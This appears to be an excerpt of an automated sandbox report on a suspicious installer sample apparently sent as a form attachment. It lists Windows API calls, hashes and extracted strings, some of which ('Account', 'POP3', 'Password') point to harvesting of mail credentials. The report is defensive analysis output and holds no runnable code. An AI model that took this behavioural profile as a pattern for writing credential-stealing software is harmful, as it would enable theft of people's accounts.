• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: f793f11cfb9f99987807b9d7d39b2fc34e91fc0b51f611b2d4baa6e76222b974
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: B361E3B7D04338ABEF158FA4CC80BDEF7B9AF45204F448056E105A7290EB745A85CF92

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 9c2df0e3ba552710b068be249f2415e00964da369cd26b521be3b401585640f2
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: 2271E3B7D042385BDF229FA4DCC4AEFBBFCAB09240F548096D544E7241E6749B85CBA0

APIs
• lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A28
• CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A4C
• GetShortPathNameA.KERNEL32(00000000,00421A70,00000400), ref: 00405A55
  • Part of subcall function 004058D6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
  • Part of subcall function 004058D6: lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
• GetShortPathNameA.KERNEL32(?,00421E70,00000400), ref: 00405A72
• wsprintfA.USER32 ref: 00405A90
• GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405ACB
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405ADA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B12
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B7A
• GlobalFree.KERNEL32(00000000), ref: 00405B81
• CloseHandle.KERNEL32(00000000), ref: 00405B88
  • Part of subcall function 00405971: GetFileAttributesA.KERNEL32(00000003,00402CBE,0042AC00,80000000,00000003), ref: 00405975
  • Part of subcall function 00405971: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405997
Strings
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %s=%s$NUL$[Rename]
• API String ID: 1265525490-4148678300
• Opcode ID: b2a8a82cc1dbdd596541406d3a7cb4088ed287b027b0234e96387c743e3667b6
• Instruction ID: b5c81c1859d8f1192d2ecd791256e289f06fc5ca0860dc0d9e47344a35b8d296
• Opcode Fuzzy Hash: b2a8a82cc1dbdd596541406d3a7cb4088ed287b027b0234e96387c743e3667b6
• Instruction Fuzzy Hash: 2F41CE71604B19BFD2206B615C49F7B3A6CEB45764F14013AFD05B62D2EA7CB8018E7E
APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,?), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,00422EE0,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
• Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
• Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
• Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
APIs
• ___free_lconv_mon.LIBCMT ref: 333E7D06
  • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E90D7
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E90E9
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E90FB
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E910D
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E911F
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9131
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9143
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9155
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9167
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E9179
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E918B
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E919D
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E91AF
                                                                                                              • _free.LIBCMT ref: 333E7CFB
                                                                                                                • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
                                                                                                                • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
                                                                                                              • _free.LIBCMT ref: 333E7D1D
                                                                                                              • _free.LIBCMT ref: 333E7D32
                                                                                                              • _free.LIBCMT ref: 333E7D3D
                                                                                                              • _free.LIBCMT ref: 333E7D5F
                                                                                                              • _free.LIBCMT ref: 333E7D72
                                                                                                              • _free.LIBCMT ref: 333E7D80
                                                                                                              • _free.LIBCMT ref: 333E7D8B
                                                                                                              • _free.LIBCMT ref: 333E7DC3
                                                                                                              • _free.LIBCMT ref: 333E7DCA
                                                                                                              • _free.LIBCMT ref: 333E7DE7
                                                                                                              • _free.LIBCMT ref: 333E7DFF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: f6f4895feec0bb16d62f5430239cdc17e05434d61a71e6e4ea0accd212f4ebef
                                                                                                              • Instruction ID: 7145f5c9226cab7d7b5a785b6b02e3e41164f6ea405e6d32228f745a20af1e01
                                                                                                              • Opcode Fuzzy Hash: f6f4895feec0bb16d62f5430239cdc17e05434d61a71e6e4ea0accd212f4ebef
                                                                                                              • Instruction Fuzzy Hash: 78313877E40324EFEB219EB8DD80B67B7EAEF00290F54C469F848D7650DA35E8909B10
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040445B
                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404485
                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404536
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404541
                                                                                                              • lstrcmpiA.KERNEL32(00422680,0041FCE0), ref: 00404573
                                                                                                              • lstrcatA.KERNEL32(?,00422680), ref: 0040457F
                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404591
                                                                                                                • Part of subcall function 004054D8: GetDlgItemTextA.USER32(?,?,00000400,004045C8), ref: 004054EB
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FA3
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FB5
                                                                                                                • Part of subcall function 00405F4B: CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FC5
                                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464C
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404667
                                                                                                              • SetDlgItemTextA.USER32(00000000,00000400,0041ECA0), ref: 004046ED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                              • String ID: A
                                                                                                              • API String ID: 2246997448-3554254475
                                                                                                              • Opcode ID: 03555cd9ff27d87b3461e579a81a8a683152280691b435c6bb34a1f742241f1a
                                                                                                              • Instruction ID: 313b0aeaa0dd49dd5f389a011650d1956071e47b5f1a5152bec8bcd399de40b9
                                                                                                              • Opcode Fuzzy Hash: 03555cd9ff27d87b3461e579a81a8a683152280691b435c6bb34a1f742241f1a
                                                                                                              • Instruction Fuzzy Hash: 049193B1900209ABDB10AFA1CD45BAF77B8EF85305F10847BFA01B72C1D77C9A418B69
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402C8F
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402CAB
                                                                                                                • Part of subcall function 00405971: GetFileAttributesA.KERNEL32(00000003,00402CBE,0042AC00,80000000,00000003), ref: 00405975
                                                                                                                • Part of subcall function 00405971: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CF4
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E3B
                                                                                                              Strings
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E84
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                                                              • soft, xrefs: 00402D6B
                                                                                                              • Error launching installer, xrefs: 00402CCB
                                                                                                              • Null, xrefs: 00402D74
                                                                                                              • Inst, xrefs: 00402D62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                              • API String ID: 2803837635-3016655952
                                                                                                              • Opcode ID: fa81fe972bfe3a764a13f7ad6aa669890b63427a85530cdf1b6a935a473f56a1
                                                                                                              • Instruction ID: 9de56974c203d5571711bd7ea282ed8ac83b373a822f3244ccbcaf21db740533
                                                                                                              • Opcode Fuzzy Hash: fa81fe972bfe3a764a13f7ad6aa669890b63427a85530cdf1b6a935a473f56a1
                                                                                                              • Instruction Fuzzy Hash: 1061E471A40205ABDB20AF65DE49B9E76B8EB14315F20403BF905B72D1D7BC9D408B9C
                                                                                                              APIs
                                                                                                              • GetVersion.KERNEL32(?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405DB3
                                                                                                              • GetSystemDirectoryA.KERNEL32(00422680,00000400), ref: 00405E2E
                                                                                                              • GetWindowsDirectoryA.KERNEL32(00422680,00000400), ref: 00405E41
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7D
                                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,00422680), ref: 00405E8B
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00405E96
                                                                                                              • lstrcatA.KERNEL32(00422680,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB8
                                                                                                              • lstrlenA.KERNEL32(00422680,?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405F0A
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405DFD
                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EB2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 900638850-730719616
                                                                                                              • Opcode ID: 4eb09dbf17218f190c0a8c026c82e86a8bda34622b00820e868bf8cd3cf9af1c
                                                                                                              • Instruction ID: 2b293d25366fc547a30ad863a8204623ae8d1739f01cc20b9afdcfd3690b1d74
                                                                                                              • Opcode Fuzzy Hash: 4eb09dbf17218f190c0a8c026c82e86a8bda34622b00820e868bf8cd3cf9af1c
                                                                                                              • Instruction Fuzzy Hash: 46611271A04A05AAEB215F24EC88BBF3B68EB15310F10813BE541B62D1D37D4A42DF9E
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 333E59EA
                                                                                                                • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
                                                                                                                • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
                                                                                                              • _free.LIBCMT ref: 333E59F6
                                                                                                              • _free.LIBCMT ref: 333E5A01
                                                                                                              • _free.LIBCMT ref: 333E5A0C
                                                                                                              • _free.LIBCMT ref: 333E5A17
                                                                                                              • _free.LIBCMT ref: 333E5A22
                                                                                                              • _free.LIBCMT ref: 333E5A2D
                                                                                                              • _free.LIBCMT ref: 333E5A38
                                                                                                              • _free.LIBCMT ref: 333E5A43
                                                                                                              • _free.LIBCMT ref: 333E5A51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: c319b3c15e1ba54c6a495a7a1661eb5c0cfce6aa750af677381257330655a223
                                                                                                              • Instruction ID: f44fbd9c17bcae098813533fd7d4e96fc1c00f18c80447ec9b740abf21a2ed9f
                                                                                                              • Opcode Fuzzy Hash: c319b3c15e1ba54c6a495a7a1661eb5c0cfce6aa750af677381257330655a223
                                                                                                              • Instruction Fuzzy Hash: 2011867BD20258FFEB11DF54C981CDD3FA5EF04290B5581A5BA088F625DA31EA60AB80
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: d59ddeae74b7af85802262f1e2a88390438ddd3d719c1d9b4c0695114bc5ed0a
• Instruction ID: e84eb3d5d4e2abaaad211df9259b66f225613287484248aaba6e768b904932b9
• Opcode Fuzzy Hash: d59ddeae74b7af85802262f1e2a88390438ddd3d719c1d9b4c0695114bc5ed0a
• Instruction Fuzzy Hash: 1E5151BA91472ACBDF00EFA8E9445ED7FB9FF49310F95C185E480A7654CB368A24C714
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 333E1D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D8A
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: 47bbcd131a3dd0392808bd7d3efa6542072828fd84b9be1bd9c9bbc5c26a3270
• Instruction ID: cbe70fd32f75e404194bdbb8301a8bea7d753ea423aebf2f4ec9db4bf69cc785
• Opcode Fuzzy Hash: 47bbcd131a3dd0392808bd7d3efa6542072828fd84b9be1bd9c9bbc5c26a3270
• Instruction Fuzzy Hash: D721FFB2D4122CAFE720AFA0CC8CEFBB6ECEB49355F0445A5F515E2141D6749E468B70
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00404052
• GetSysColor.USER32(00000000), ref: 0040406E
• SetTextColor.GDI32(?,00000000), ref: 0040407A
• SetBkMode.GDI32(?,?), ref: 00404086
• GetSysColor.USER32(?), ref: 00404099
• SetBkColor.GDI32(?,?), ref: 004040A9
• DeleteObject.GDI32(?), ref: 004040C3
• CreateBrushIndirect.GDI32(?), ref: 004040CD
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
• Instruction ID: aac8be200c2a37c7c3a3d9d61c48e2962f0c237efd7738e790c95123d26b84df
• Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
• Instruction Fuzzy Hash: 732184B19047049BC7319F68DD08B4BBBF8AF41714F048A29EA95F22E1D738E944CB55
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,333E9C07,?,00000000,?,00000000,00000000), ref: 333E94D4
• __fassign.LIBCMT ref: 333E954F
• __fassign.LIBCMT ref: 333E956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 333E9590
• WriteFile.KERNEL32(?,?,00000000,333E9C07,00000000,?,?,?,?,?,?,?,?,?,333E9C07,?), ref: 333E95AF
• WriteFile.KERNEL32(?,?,?,333E9C07,00000000,?,?,?,?,?,?,?,?,?,333E9C07,?), ref: 333E95E8
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: e289d8ebd6a75b7629b8f937eb95b3449302f1f610b6c0a0673000854fa93629
• Instruction ID: 59c2fce5399807778fe19d995c0f22ab8ae77a460b0dad36bde6f773a0b48dfa
• Opcode Fuzzy Hash: e289d8ebd6a75b7629b8f937eb95b3449302f1f610b6c0a0673000854fa93629
• Instruction Fuzzy Hash: D851B4B6D00219AFDB10CFA8CC95AEEBBF8EF49310F14811AE595F7281D734A941CB61
APIs
• _ValidateLocalCookies.LIBCMT ref: 333E339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 333E33A3
• _ValidateLocalCookies.LIBCMT ref: 333E3431
• __IsNonwritableInCurrentImage.LIBCMT ref: 333E345C
• _ValidateLocalCookies.LIBCMT ref: 333E34B1
Strings
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 1a06751187d594410c4f717dd48c66b369fe2cc47e1181fa6bbd13aa1e93d0eb
• Instruction ID: 2f07004898b4d4dc21acd9baf3c5244db318625ac3376ac3eb8d5252c17a90a0
• Opcode Fuzzy Hash: 1a06751187d594410c4f717dd48c66b369fe2cc47e1181fa6bbd13aa1e93d0eb
• Instruction Fuzzy Hash: 5141E37AE003289BCB01DF68C880A9EBBF5AF45334F48D195E815AB351D731EA41CF92
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
• GlobalFree.KERNEL32(?), ref: 0040272E
• WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
• GlobalFree.KERNEL32(00000000), ref: 00402747
• CloseHandle.KERNEL32(?), ref: 0040275F
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
